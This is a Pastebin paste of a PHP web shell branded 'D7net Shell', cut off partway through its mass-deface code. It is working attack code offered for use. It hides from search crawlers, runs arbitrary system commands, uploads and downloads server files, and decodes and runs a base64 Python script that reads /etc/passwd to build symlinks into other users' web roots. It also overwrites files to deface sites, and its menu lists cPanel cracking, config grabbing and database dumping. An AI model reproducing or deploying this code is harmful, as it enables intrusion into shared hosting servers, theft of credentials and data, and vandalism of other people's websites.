SHARE
TWEET

Paw

a guest Apr 27th, 2018 372 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. /* (Sh3ll By D7net  |default pass:" d7net ") */
  3. $auth_pass = "9bf6939f48b06e09f5d63e0a0900f667";
  4. session_start();
  5. error_reporting(0);
  6. set_time_limit(0);
  7. @set_magic_quotes_runtime(0);
  8. @clearstatcache();
  9. @ini_set('error_log',NULL);
  10. @ini_set('log_errors',0);
  11. @ini_set('max_execution_time',0);
  12. @ini_set('output_buffering',0);
  13. @ini_set('display_errors', 0);
  14.  
  15.  
  16. $color = "#00ff00";
  17. $default_action = 'FilesMan';
  18. $default_use_ajax = true;
  19. $default_charset = 'UTF-8';
  20. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  21.     $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
  22.     if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  23.         header('HTTP/1.0 404 Not Found');
  24.         exit;
  25.     }
  26. }
  27.  
  28. function login_shell() {
  29. ?>
  30. <html>
  31. <body>
  32. <head>
  33. <title>Login D7net</title>
  34. <link href='https://thecryptoshow.com/wp-content/uploads/2017/11/fatcom-1.ico' rel='icon'
  35.  
  36. type='image/x-icon'/>
  37. </header><center>
  38. <table style="border:1px;border-color:red;border-style:double;padding-left:2px;padding-
  39.  
  40. right:2px;bottom:2px;height:25px;width:17%;">
  41. <tr>
  42. <td style="border: 1px;width:5%; background: transparent;box-shadow: 0px 0px 8px red;
  43. bottom: 2px; border-color:red; border-style: dotted";>
  44. <center>
  45. <style>
  46. <style type='text/css'>
  47. @import url(https://fonts.googleapis.com/css?family=Ubuntu);
  48. html {
  49.     background: #000000;
  50.     color: #FF0000;
  51.     font-family: 'Ubuntu';
  52.     font-size: 13px;
  53.     width: 100%;
  54. }
  55. li {
  56.     display: inline;
  57.     margin: 5px;
  58.     padding: 5px;
  59. }
  60. table, th, td {
  61.     border-collapse:collapse;
  62.     font-family: Tahoma, Geneva, sans-serif;
  63.     background: transparent;
  64.     font-family: 'Ubuntu';
  65.     font-size: 13px;
  66. }
  67. .table_home, .th_home, .td_home {
  68.     border: 1px solid #FF0000;
  69. }
  70. input[type=text], input[type=password],input[type=submit] {
  71.     background: transparent;
  72.     color: #FF0000;
  73.     border: 1px solid #FF0000;
  74.     margin: 5px auto;
  75.     padding-left: 5px;
  76.     font-family: 'Ubuntu';
  77.     font-size: 13px;
  78.  
  79. </style>
  80. <img border="0" data-original-height="1280" data-original-width="1280" height="320" src="https://3.bp.blogspot.com/-qfeAr7jKSK0/WsNmPE0HlPI/AAAAAAAAAYA/Y0tgaQ8Mlso_SD78ymIBXCB7T1O_Nh6-QCPcBGAYYCw/s320/d704.png" width="320"/><br></table></td>
  81. <div align=center >
  82. <fieldset style="border: 1px solid rgb(69, 69, 69); padding:
  83.  
  84. 4px;width:450px;bgcolor:grey;align:center;font-family:tahoma;font-size:10pt"><legend><font
  85.  
  86. color=red><B>Login</b></font></legend><legend>
  87. <div>
  88. <form method="post">
  89. <font face ='papyrus' size='3' color='red'>Password :
  90. <input type="password" name="pass">
  91.     <input type="submit" value="Login">
  92. </form></fieldset>
  93. <?php
  94. exit;
  95. }
  96. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
  97.     if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
  98.         $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  99.     else
  100.         login_shell();
  101. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
  102.     @ob_clean();
  103.     $file = $_GET['file'];
  104.     header('Content-Description: File Transfer');
  105.     header('Content-Type: application/octet-stream');
  106.     header('Content-Disposition: attachment; filename="'.basename($file).'"');
  107.     header('Expires: 0');
  108.     header('Cache-Control: must-revalidate');
  109.     header('Pragma: public');
  110.     header('Content-Length: ' . filesize($file));
  111.     readfile($file);
  112.     exit;
  113. }
  114. ?>
  115.  
  116. <html>
  117. <head>
  118. <title> . : : D7net Shell : : . </title>
  119. <meta name='author' content='D7net'>
  120. <meta charset="UTF-8">
  121. <center>
  122. <img style="position: fixed; top:0; right:2; z-index:100;" height="200" src="https://3.bp.blogspot.com/-qfeAr7jKSK0/WsNmPE0HlPI/AAAAAAAAAYA/Y0tgaQ8Mlso_SD78ymIBXCB7T1O_Nh6-QCPcBGAYYCw/s320/d704.png" width="200"/>
  123. <span style='color: red;'>[ D7net <font style='color: yellow;'>SheLL ]</font><br>
  124. <style type='text/css'>
  125. @import url(https://fonts.googleapis.com/css?family=Ubuntu);
  126. html {
  127.     background: #000000;
  128.     color: #fb2021;
  129.     font-family: 'comic sans ms';
  130.     font-size: 13px;
  131.     width: 100%;
  132. }
  133.  
  134. table, th, td {
  135.     background:#000000;
  136.     border-bottom:1px solid #FF0000;
  137.     border-left:1px solid #FF0000;
  138.     border-top:1px solid #FF0000;
  139.     border-right:1px solid #FF0000;
  140. font-weight:normal;
  141. }
  142. .table_home, .th_home, .td_home {
  143.     text-align:left;
  144.     margin:0 4px 0 0;
  145.     padding:0 4px 0 0;
  146. }
  147. th {
  148.     background:#f6f209;
  149.     border-bottom:1px solid #333333;
  150. font-weight:normal;
  151. }
  152. a {
  153.     color: #ff0000;
  154.     text-decoration: none;
  155. }
  156. a:hover {
  157.     color: blue;
  158.     text-decoration: italic;
  159. }
  160. b {
  161.     color: gold;
  162. }
  163. input[type=text], input[type=password],input[type=submit] {
  164.     background: transparent;
  165.     color: #ffffff;
  166.     border: 2px solid #ff0000;
  167.     margin: 5px auto;
  168.     padding-left: 5px;
  169.     font-family: 'Ubuntu';
  170.     font-size: 13px;
  171. }
  172. textarea {
  173.     width: 100%;
  174.     height: 400px;
  175.     border: 2px #000000 solid;
  176.     -moz-border-radius: 5px;
  177.     -webkit-border-radius:5px;
  178.     border-radius:5px;
  179.     border-bottom:3px solid #FF0000;
  180.     border-left:3px solid #FF0000;
  181.     border-top:3px solid #FF0000;
  182.     border-right:3px solid #FF0000;
  183. }
  184. .d7net_table {
  185.     -moz-box-shadow:inset 0px 34px 0px -15px #1a1717;
  186.     -webkit-box-shadow:inset 0px 34px 0px -15px #1a1717;
  187.     box-shadow:inset 0px 34px 0px -15px #1a1717;
  188.     background-color:#000000;
  189.     border:1px solid #ff0000;
  190.     display:inline-block;
  191.     cursor:pointer;
  192.     color:#ff0505;
  193.     font-family:comis sans ms;
  194.     font-size:17px;
  195.     font-weight:bold;
  196.     padding:5px 14px;
  197.     text-decoration:none;
  198.     text-shadow:0px -1px 0px #ff0505;
  199. }
  200. .d7net_table:hover {
  201.     background-color:#8f1b0b;
  202. }
  203. .d7net_table:active {
  204.     position:relative;
  205.     top:1px;
  206. }
  207. #content td:hover{
  208. background-color: #8f1b0b;
  209. text-shadow:2px 2px 10px #ffffff;
  210. }
  211. .bgd7net {width:1250px;height:15;background-color:#FF0000;
  212. filter:progid:DXImageTransform.Microsoft.gradient(GradientType=0, startColorstr='#FF0000', endColorstr='#FF0000');
  213. background-image:-webkit-linear-gradient(top, #FF0000 0%, #061cf3 50%, #000000 100%);
  214. background-image:-moz-linear-gradient(top, #FF0000 0%, #000000 50%, #000000  100%);
  215. background-image:-ms-linear-gradient(top, #000000 0%, #061cf3%, #000000  100%);
  216. background-image:-o-linear-gradient(top, #000000 0%, #061cf3%, #000000  100%);
  217.   background-image:linear-gradient(top, #000000 0%, #061cf3%, #000000  100%);
  218. }
  219.  
  220. </style>
  221. <?php
  222. function w($dir,$perm) {
  223.     if(!is_writable($dir)) {
  224.         return "<font color=red>".$perm."</font>";
  225.     } else {
  226.         return "<font color=yellow>".$perm."</font>";
  227.     }
  228. }
  229. function exe($cmd) {    
  230. if(function_exists('system')) {        
  231.         @ob_start();       
  232.         @system($cmd);     
  233.         $buff = @ob_get_contents();        
  234.         @ob_end_clean();       
  235.         return $buff;  
  236.     } elseif(function_exists('exec')) {        
  237.         @exec($cmd,$results);      
  238.         $buff = "";        
  239.         foreach($results as $result) {         
  240.             $buff .= $result;      
  241.         } return $buff;    
  242.     } elseif(function_exists('passthru')) {        
  243.         @ob_start();       
  244.         @passthru($cmd);       
  245.         $buff = @ob_get_contents();        
  246.         @ob_end_clean();       
  247.         return $buff;  
  248.     } elseif(function_exists('shell_exec')) {      
  249.         $buff = @shell_exec($cmd);     
  250.         return $buff;  
  251.     }
  252. }
  253. function perms($file){
  254. $perms = fileperms($file);
  255. if (($perms & 0xC000) == 0xC000) {
  256. // Socket
  257. $info = 's';
  258. } elseif (($perms & 0xA000) == 0xA000) {
  259. // Symbolic Link
  260. $info = 'l';
  261. } elseif (($perms & 0x8000) == 0x8000) {
  262. // Regular
  263. $info = '-';
  264. } elseif (($perms & 0x6000) == 0x6000) {
  265. // Block special
  266. $info = 'b';
  267. } elseif (($perms & 0x4000) == 0x4000) {
  268. // Directory
  269. $info = 'd';
  270. } elseif (($perms & 0x2000) == 0x2000) {
  271. // Character special
  272. $info = 'c';
  273. } elseif (($perms & 0x1000) == 0x1000) {
  274. // FIFO pipe
  275. $info = 'p';
  276. } else {
  277. // Unknown
  278. $info = 'u';
  279. }
  280.     // Owner
  281. $info .= (($perms & 0x0100) ? 'r' : '-');
  282. $info .= (($perms & 0x0080) ? 'w' : '-');
  283. $info .= (($perms & 0x0040) ?
  284. (($perms & 0x0800) ? 's' : 'x' ) :
  285. (($perms & 0x0800) ? 'S' : '-'));
  286. // Group
  287. $info .= (($perms & 0x0020) ? 'r' : '-');
  288. $info .= (($perms & 0x0010) ? 'w' : '-');
  289. $info .= (($perms & 0x0008) ?
  290. (($perms & 0x0400) ? 's' : 'x' ) :
  291. (($perms & 0x0400) ? 'S' : '-'));
  292. // World
  293. $info .= (($perms & 0x0004) ? 'r' : '-');
  294. $info .= (($perms & 0x0002) ? 'w' : '-');
  295. $info .= (($perms & 0x0001) ?
  296. (($perms & 0x0200) ? 't' : 'x' ) :
  297. (($perms & 0x0200) ? 'T' : '-'));
  298. return $info;
  299. }
  300. function hdd($s) {
  301. if($s >= 1073741824)
  302. return sprintf('%1.2f',$s / 1073741824 ).' GB';
  303. elseif($s >= 1048576)
  304. return sprintf('%1.2f',$s / 1048576 ) .' MB';
  305. elseif($s >= 1024)
  306. return sprintf('%1.2f',$s / 1024 ) .' KB';
  307. else
  308. return $s .' B';
  309. }
  310. function ambilKata($param, $kata1, $kata2){
  311.     if(strpos($param, $kata1) === FALSE) return FALSE;
  312.     if(strpos($param, $kata2) === FALSE) return FALSE;
  313.     $start = strpos($param, $kata1) + strlen($kata1);
  314.     $end = strpos($param, $kata2, $start);
  315.     $return = substr($param, $start, $end - $start);
  316.     return $return;
  317. }
  318. if(get_magic_quotes_gpc()) {
  319.     function idx_ss($array) {
  320.         return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
  321.     }
  322.     $_POST = idx_ss($_POST);
  323. }
  324.  
  325. error_reporting(0);
  326. error_log(0);
  327. @ini_set('error_log',NULL);
  328. @ini_set('log_errors',0);
  329. @ini_set('max_execution_time',0);
  330. @set_time_limit(0);
  331. @set_magic_quotes_runtime(0);
  332. if(isset($_GET['dir'])) {
  333.     $dir = $_GET['dir'];
  334.     chdir($_GET['dir']);
  335. } else {
  336.     $dir = getcwd();
  337. }
  338. $dir = str_replace("\\","/",$dir);
  339. $scdir = explode("/", $dir);
  340. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=yellow>OFF</font>";
  341. $ds = @ini_get("disable_functions");
  342. $mysql = (function_exists('mysql_connect')) ? "<font color=yellow>ON</font>" : "<font color=red>OFF</font>";
  343. $curl = (function_exists('curl_version')) ? "<font color=yellow>ON</font>" : "<font color=red>OFF</font>";
  344. $wget = (exe('wget --help')) ? "<font color=yellow>ON</font>" : "<font color=red>OFF</font>";
  345. $perl = (exe('perl --help')) ? "<font color=yellow>ON</font>" : "<font color=red>OFF</font>";
  346. $python = (exe('python --help')) ? "<font color=yellow>ON</font>" : "<font color=red>OFF</font>";
  347. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=yellow>NONE</font>";
  348. if(!function_exists('posix_getegid')) {
  349.     $user = @get_current_user();
  350.     $uid = @getmyuid();
  351.     $gid = @getmygid();
  352.     $group = "?";
  353. } else {
  354.     $uid = @posix_getpwuid(posix_geteuid());
  355.     $gid = @posix_getgrgid(posix_getegid());
  356.     $user = $uid['name'];
  357.     $uid = $uid['uid'];
  358.     $group = $gid['name'];
  359.     $gid = $gid['gid'];
  360. }
  361. echo "User: <font color=yellow>".$user."</font> (".$uid.") Group: <font color=yellow>".$group."</font> (".$gid.")<br>";
  362. echo "HDD: <font color=yellow>".hdd(disk_free_space("/"))."</font> / <font color=yellow>".hdd(disk_total_space("/"))."</font><br>";
  363. echo "Safe Mode: $sm<br>";
  364. echo "Disable Functions: $show_ds<br>";
  365. echo "Server IP: <font color=yellow>".gethostbyname($_SERVER['HTTP_HOST'])."</font> | Your IP: <font color=yellow>".$_SERVER['REMOTE_ADDR']."</font><br>";
  366. echo "MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl <br>";
  367. echo "<font color=yellow>".php_uname()."</font><br>";
  368. echo " <a class='d7net_table' href='?dir=$dir&D7net=removeshell'>Delete Shell</a> ";
  369. echo "<div class='bgd7net'><br>";
  370. echo "<center>";
  371. echo "<ul>";
  372. echo " <a class='d7net_table' href='?'>Home</a> ";
  373. echo " <a class='d7net_table' href='?dir=$dir&D7net=jumping'>Jumping</a> ";
  374. echo " <a class='d7net_table' href='?dir=$dir&D7net=mass_deface'>Mass Deface</a> ";
  375. echo " <a class='d7net_table' href='?dir=$dir&D7net=cgi'>CGI Perl</a> ";
  376. echo " <a class='d7net_table' href='?dir=$dir&D7net=cpanel'>Cpanel Grab</a> ";
  377. echo " <a class='d7net_table' href='?dir=$dir&D7net=csrfexploit'>CSRF Exploiter</a>";
  378. echo " <a class='d7net_table' href='?dir=$dir&D7net=smtp'>SMTP Grabber</a><br><br> ";
  379. echo " <a class='d7net_table' href='?dir=$dir&D7net=zoneh'>Zone-H</a> ";
  380. echo " <a class='d7net_table' href='?dir=$dir&D7net=krdpshell'>K-RDP Shell</a> ";
  381. echo " <a class='d7net_table' href='?dir=$dir&D7net=vhosts'>Bypass vhost</a> ";
  382. echo " <a class='d7net_table' href='?dir=$dir&D7net=adminer'>Adminer</a> ";
  383. echo " <a class='d7net_table' href='?dir=$dir&D7net=whmcs'>whmcs decoder</a> ";
  384. echo " <a class='d7net_table' href='?dir=$dir&D7net=auto_dwp'>WordPress Auto Deface</a> ";
  385. echo " <a class='d7net_table' href='?dir=$dir&D7net=encode'>Encode/Decode</a><br><br> ";
  386. echo " <a class='d7net_table' href='?dir=$dir&D7net=symlink'>Symlink</a> ";
  387. echo " <a class='d7net_table' href='?dir=$dir&D7net=python'>Symlink Python</a> ";
  388. echo " <a class='d7net_table' href='?dir=$dir&D7net=magento'>Log Hunter</a> ";
  389. echo " <a class='d7net_table' href='?dir=$dir&D7net=auto_wp'>Auto Edit title Wordpress</a> ";
  390. echo " <a class='d7net_table' href='?dir=$dir&D7net=passwbypass'>Bypass etc/passwd</a> ";
  391. echo " <a class='d7net_table' href='?dir=$dir&D7net=zip'>Zip Menu</a>";
  392. echo " <a class='d7net_table' href='?dir=$dir&D7net=dbdump'>Database Dump</a><br><br>";
  393. echo " <a class='d7net_table' href='?dir=$dir&D7net=auto_edit_user'>Auto Edit User</a>";
  394. echo " <a class='d7net_table' href='?dir=$dir&D7net=cpanelcrck'>Cpanel Crack</a>";
  395. echo " <a class='d7net_table' href='?dir=$dir&D7net=configfuck'>Config Fucker V.2</a> ";
  396. echo " <a class='d7net_table' href='?dir=$dir&D7net=grabconfig'>Grab Config</a> ";
  397. echo " <a class='d7net_table' href='?dir=$dir&D7net=contact'>Contact</a> ";
  398. echo " <a class='d7net_table' href='?dir=$dir&D7net=about'>About</a> ";
  399. echo " <a class='d7net_table' href='?dir=$dir&D7net=keluar'>Log-Out</a> ";
  400. echo "</ul>";
  401. echo "</center>";
  402. if($_POST['upload']) {
  403.         if($_POST['tipe_upload'] == 'biasa') {
  404.             if(@copy($_FILES['ix_file']['tmp_name'], "$path/".$_FILES['ix_file']['name']."")) {
  405.                 $act = "<font color=green>Uploaded!</font> at <i><b>$path/".$_FILES['ix_file']['name']."</b></i>";
  406.             } else {
  407.                 $act = "<font color=red>Failed to upload file</font>";
  408.             }
  409.         } else {
  410.             $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
  411.             $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
  412.             if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
  413.                 if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
  414.                     $act = "<font color=green>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
  415.                 } else {
  416.                     $act = "<font color=red>Failed to upload file</font>";
  417.                 }
  418.             } else {
  419.                 $act = "<font color=red>Failed to upload file</font>";
  420.             }
  421.         }
  422.     }
  423.     echo "<center>
  424.     <form method='post' enctype='multipart/form-data'>
  425.     <input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($path,"Writeable")." ]
  426.     <input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
  427.     <input type='file' name='ix_file'>
  428.     <input type='submit' value='upload' name='upload'>
  429.     </form></center>";
  430.     echo "<center>".$act."</center>";
  431. echo "<div class='bgd7net'><br>DIR: ";
  432. foreach($scdir as $c_dir => $cdir) {   
  433.     echo "<a href='?dir=";
  434.     for($i = 0; $i <= $c_dir; $i++) {
  435.         echo $scdir[$i];
  436.         if($i != $c_dir) {
  437.         echo "/";
  438.         }
  439.     }
  440.     echo "'>$cdir</a>/";
  441. }
  442. echo "<br><br>";
  443. if($_GET['D7net'] == 'keluar') {
  444.    
  445. echo '<form action="?dir=$dir&do=metu" method="post">';
  446.     unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  447.     echo 'Logout done!!';
  448. } elseif($_GET['D7net'] == 'cgi') {
  449.     $cgi_dir = mkdir('d7net_cgi', 0755);
  450.         chdir('d7net_cgi');
  451.     $file_cgi = "cgi.d7net";
  452.         $memeg = ".htaccess";
  453.     $isi_htcgi = "OPTIONS Indexes Includes ExecCGI FollowSymLinks \n AddType application/x-httpd-cgi .con7ext \n AddHandler cgi-script .con7ext \n AddHandler cgi-script .d7net";
  454.     $htcgi = fopen(".htaccess", "w");
  455.     $cgi_script = "";
  456.     $cgi = fopen($file_cgi, "w");
  457.     fwrite($cgi, base64_decode($cgi_script));
  458.     fwrite($htcgi, $isi_htcgi);
  459.     chmod($file_cgi, 0755);
  460.         chmod($memeg, 0755);
  461.     echo "<br><center>Done ! <a href='d7net_cgi/cgi.d7net' target='_blank'>Klik Here</a>"; 
  462.  
  463. }elseif($_GET['D7net'] == 'python') {
  464.     $sym_dir = mkdir('d7net_sympy', 0755);
  465.         chdir('d7net_sympy');
  466.     $file_sym = "sym.py";
  467.     $sym_script = "Iy8qUHl0aG9uDQoNCmltcG9ydCB0aW1lDQppbXBvcnQgb3MNCmltcG9ydCBzeXMNCmltcG9ydCByZQ0KDQpvcy5zeXN0ZW0oImNvbG9yIEMiKQ0KDQpodGEgPSAiXG5GaWxlIDogLmh0YWNjZXNzIC8vIENyZWF0ZWQgU3VjY2Vzc2Z1bGx5IVxuIg0KZiA9ICJBbGwgUHJvY2Vzc2VzIERvbmUhXG5TeW1saW5rIEJ5cGFzc2VkIFN1Y2Nlc3NmdWxseSFcbiINCnByaW50ICJcbiINCnByaW50ICJ+Iio2MA0KcHJpbnQgIlN5bWxpbmsgQnlwYXNzIDIwMTQgYnkgTWluZGxlc3MgSW5qZWN0b3IgIg0KcHJpbnQgIiAgICAgICAgICAgICAgU3BlY2lhbCBHcmVldHogdG8gOiBQYWsgQ3liZXIgU2t1bGx6Ig0KcHJpbnQgIn4iKjYwDQoNCm9zLm1ha2VkaXJzKCdkN25ldHN5bXB5JykNCm9zLmNoZGlyKCdkN25ldHN5bXB5JykNCg0Kc3Vzcj1bXQ0Kc2l0ZXg9W10NCm9zLnN5c3RlbSgibG4gLXMgLyBkN25ldC50eHQiKQ0KDQpoID0gIk9wdGlvbnMgSW5kZXhlcyBGb2xsb3dTeW1MaW5rc1xuRGlyZWN0b3J5SW5kZXggYnJ1ZHVsLnBodG1sXG5BZGRUeXBlIHR4dCAucGhwXG5BZGRIYW5kbGVyIHR4dCAucGhwIg0KbSA9IG9wZW4oIi5odGFjY2VzcyIsIncrIikNCm0ud3JpdGUoaCkNCm0uY2xvc2UoKQ0KcHJpbnQgaHRhDQoNCnNmID0gIjxodG1sPjx0aXRsZT5TeW1saW5rIFB5dGhvbjwvdGl0bGU+PGNlbnRlcj48Zm9udCBjb2xvcj13aGl0ZSBzaXplPTU+U3ltbGluayBCeXBhc3MgMjAxODxicj48Zm9udCBzaXplPTQ+TWFkZSBCeSBNaW5kbGVzcyBJbmplY3RvciA8YnI+UmVjb2RlZCBCeSBEN25ldDwvZm9udD48L2ZvbnQ+PGJyPjxmb250IGNvbG9yPXdoaXRlIHNpemU9Mz48dGFibGU+Ig0KDQpvID0gb3BlbignL2V0Yy9wYXNzd2QnLCdyJykNCm89by5yZWFkKCkNCm8gPSByZS5maW5kYWxsKCcvaG9tZS9cdysnLG8pDQoNCmZvciB4dXNyIGluIG86DQoJeHVzcj14dXNyLnJlcGxhY2UoJy9ob21lLycsJycpDQoJc3Vzci5hcHBlbmQoeHVzcikNCnByaW50ICItIiozMA0KeHNpdGUgPSBvcy5saXN0ZGlyKCIvdmFyL25hbWVkIikNCg0KZm9yIHh4c2l0ZSBpbiB4c2l0ZToNCgl4eHNpdGU9eHhzaXRlLnJlcGxhY2UoIi5kYiIsIiIpDQoJc2l0ZXguYXBwZW5kKHh4c2l0ZSkNCnByaW50IGYNCnBhdGg9b3MuZ2V0Y3dkKCkNCmlmICIvcHVibGljX2h0bWwvIiBpbiBwYXRoOg0KCXBhdGg9Ii9wdWJsaWNfaHRtbC8iDQplbHNlOg0KCXBhdGggPSAiL2h0bWwvIg0KY291bnRlcj0xDQppcHM9b3BlbigiYnJ1ZHVsLnBodG1sIiwidyIpDQppcHMud3JpdGUoc2YpDQoNCmZvciBmdXNyIGluIHN1c3I6DQoJZm9yIGZzaXRlIGluIHNpdGV4Og0KCQlmdT1mdXNyWzA6NV0NCgkJcz1mc2l0ZVswOjVdDQoJCWlmIGZ1PT1zOg0KCQkJaXBzLndyaXRlKCI8Ym9keSBiZ2NvbG9yPWJsYWNrPjx0cj48dGQgc3R5bGU9Zm9udC1mYW1pbHk6Y2FsaWJyaTtmb250LXdlaWdodDpib2xkO2NvbG9yOndoaXRlOz4lczwvdGQ+PHRkIHN0eWxlPWZvbnQtZmFtaWx5OmNhbGlicmk7Zm9udC13ZWlnaHQ6Ym9sZDtjb2xvcjpyZWQ7PiVzPC90ZD48dGQgc3R5bGU9Zm9udC1mYW1pbHk6Y2FsaWJyaTtmb250LXdlaWdodDpib2xkOz48YSBocmVmPWQ3bmV0LnR4dC9ob21lLyVzJXMgdGFyZ2V0PV9ibGFuayA+JXM8L2E+PC90ZD4iJShjb3VudGVyLGZ1c3IsZnVzcixwYXRoLGZzaXRlKSkNCgkJCWNvdW50ZXI9Y291bnRlcisx";
  468.         $sym = fopen($file_sym, "w");
  469.     fwrite($sym, base64_decode($sym_script));
  470.     chmod($file_sym, 0755);
  471.         $jancok = exe("python sym.py");
  472.     echo "<br><center>Done ... <a href='d7net_sympy/d7netsympy/' target='_blank'>Klik Here</a>";
  473. } elseif($_GET['D7net'] == 'symlink')
  474. {  
  475. @set_time_limit(0);
  476.  
  477. echo "<br><br><center><h1>Symlink</h1></center><br><br><center><div class=content>";
  478.  
  479. @mkdir('d7net_sym',0777);
  480. $htaccess  = "Options all n DirectoryIndex Sux.html n AddType text/plain .php n AddHandler server-parsed .php n  AddType text/plain .html n AddHandler txt .html n Require None n Satisfy Any";
  481. $write =@fopen ('d7net_sym/.htaccess','w');
  482. fwrite($write ,$htaccess);
  483. @symlink('/','sym/root');
  484. $filelocation = basename(__FILE__);
  485. $read_named_conf = @file('/etc/named.conf');
  486. if(!$read_named_conf)
  487. {
  488. echo "<pre class=ml1 style='margin-top:5px'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";
  489. }
  490. else
  491. {
  492. echo "<br><br><div class='tmp'><table border='1' bordercolor='white' width='500' cellpadding='1' cellspacing='0'><td>Domains</td><td>Users</td><td>symlink </td>";
  493. foreach($read_named_conf as $subject){
  494. if(eregi('zone',$subject)){
  495. preg_match_all('#zone "(.*)"#',$subject,$string);
  496. flush();
  497. if(strlen(trim($string[1][0])) >2){
  498. $UID = posix_getpwuid(@fileowner('/etc/valiases/'.$string[1][0]));
  499. $name = $UID['name'] ;
  500. @symlink('/','sym/root');
  501. $name   = $string[1][0];
  502. $iran   = '.ir';
  503. $israel = '.il';
  504. $indo   = '.id';
  505. $sg12   = '.sg';
  506. $edu    = '.edu';
  507. $gov    = '.gov';
  508. $gose   = '.go';
  509. $gober  = '.gob';
  510. $mil1   = '.mil';
  511. $mil2   = '.mi';
  512. $malay  = '.my';
  513. $china  = '.cn';
  514. $japan  = '.jp';
  515. $austr  = '.au';
  516. $porn   = '.xxx';
  517. $as     = '.uk';
  518. $calfn  = '.ca';
  519.  
  520. if (eregi("$iran",$string[1][0]) or eregi("$israel",$string[1][0]) or eregi("$indo",$string[1][0])or eregi("$sg12",$string[1][0]) or eregi ("$edu",$string[1][0]) or eregi ("$gov",$string[1][0])
  521. or eregi ("$gose",$string[1][0]) or eregi("$gober",$string[1][0]) or eregi("$mil1",$string[1][0]) or eregi ("$mil2",$string[1][0])
  522. or eregi ("$malay",$string[1][0]) or eregi("$china",$string[1][0]) or eregi("$japan",$string[1][0]) or eregi ("$austr",$string[1][0])
  523. or eregi("$porn",$string[1][0]) or eregi("$as",$string[1][0]) or eregi ("$calfn",$string[1][0]))
  524. {
  525. $name = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>".$string[1][0].'</div>';
  526. }
  527. echo "
  528. <tr>
  529.  
  530. <td>
  531. <div class='dom'><a target='_blank' href=http://www.".$string[1][0].'/>'.$name.' </a> </div>
  532. </td>
  533.  
  534. <td>
  535. '.$UID['name']."
  536. </td>
  537.  
  538. <td>
  539. <a href='sym/root/home/".$UID['name']."/public_html' target='_blank'>Symlink </a>
  540. </td>
  541.  
  542. </tr></div> ";
  543. flush();
  544. }
  545. }
  546. }
  547. }
  548.  
  549. echo "</center></table>";
  550. } elseif($_GET['D7net'] == 'mass_deface') {
  551.     echo "<center><form action=\"\" method=\"post\">\n";
  552.     $dirr=$_POST['d_dir'];
  553.     $index = $_POST["script"];
  554.     $index = str_replace('"',"'",$index);
  555.     $index = stripslashes($index);
  556.     function edit_file($file,$index){
  557.         if (is_writable($file)) {
  558.         clear_fill($file,$index);
  559.         echo "<Span style='color:green;'><strong> [+] Nyabun 100% Successfull </strong></span><br></center>";
  560.         }
  561.         else {
  562.             echo "<Span style='color:red;'><strong> [-] Ternyata Tidak Boleh Menyabun Disini :( </strong></span><br></center>";
  563.             }
  564.             }
  565.     function hapus_massal($dir,$namafile) {
  566.         if(is_writable($dir)) {
  567.             $dira = scandir($dir);
  568.             foreach($dira as $dirb) {
  569.                 $dirc = "$dir/$dirb";
  570.                 $lokasi = $dirc.'/'.$namafile;
  571.                 if($dirb === '.') {
  572.                     if(file_exists("$dir/$namafile")) {
  573.                         unlink("$dir/$namafile");
  574.                     }
  575.                 } elseif($dirb === '..') {
  576.                     if(file_exists("".dirname($dir)."/$namafile")) {
  577.                         unlink("".dirname($dir)."/$namafile");
  578.                     }
  579.                 } else {
  580.                     if(is_dir($dirc)) {
  581.                         if(is_writable($dirc)) {
  582.                             if(file_exists($lokasi)) {
  583.                                 echo "[<font color=lime>DELETED</font>] $lokasi<br>";
  584.                                 unlink($lokasi);
  585.                                 $idx = hapus_massal($dirc,$namafile);
  586.                             }
  587.                         }
  588.                     }
  589.                 }
  590.             }
  591.         }
  592.     }
  593.     function clear_fill($file,$index){
  594.         if(file_exists($file)){
  595.             $handle = fopen($file,'w');
  596.             fwrite($handle,'');
  597.             fwrite($handle,$index);
  598.             fclose($handle);  } }
  599.  
  600.     function gass(){
  601.         global $dirr , $index ;
  602.         chdir($dirr);
  603.         $me = str_replace(dirname(__FILE__).'/','',__FILE__);
  604.         $files = scandir($dirr) ;
  605.         $notallow = array(".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","..",".");
  606.         sort($files);
  607.         $n = 0 ;
  608.         foreach ($files as $file){
  609.             if ( $file != $me && is_dir($file) != 1 && !in_array($file, $notallow) ) {
  610.                 echo "<center><Span style='color: #8A8A8A;'><strong>$dirr/</span>$file</strong> ====> ";
  611.                 edit_file($file,$index);
  612.                 flush();
  613.                 $n = $n +1 ;
  614.                 }
  615.                 }
  616.                 echo "<br>";
  617.                 echo "<center><br><h3>$n Kali Anda Telah Ngecrot  Disini </h3></center><br>";
  618.                     }
  619.     function ListFiles($dirrall) {
  620.  
  621.     if($dh = opendir($dirrall)) {
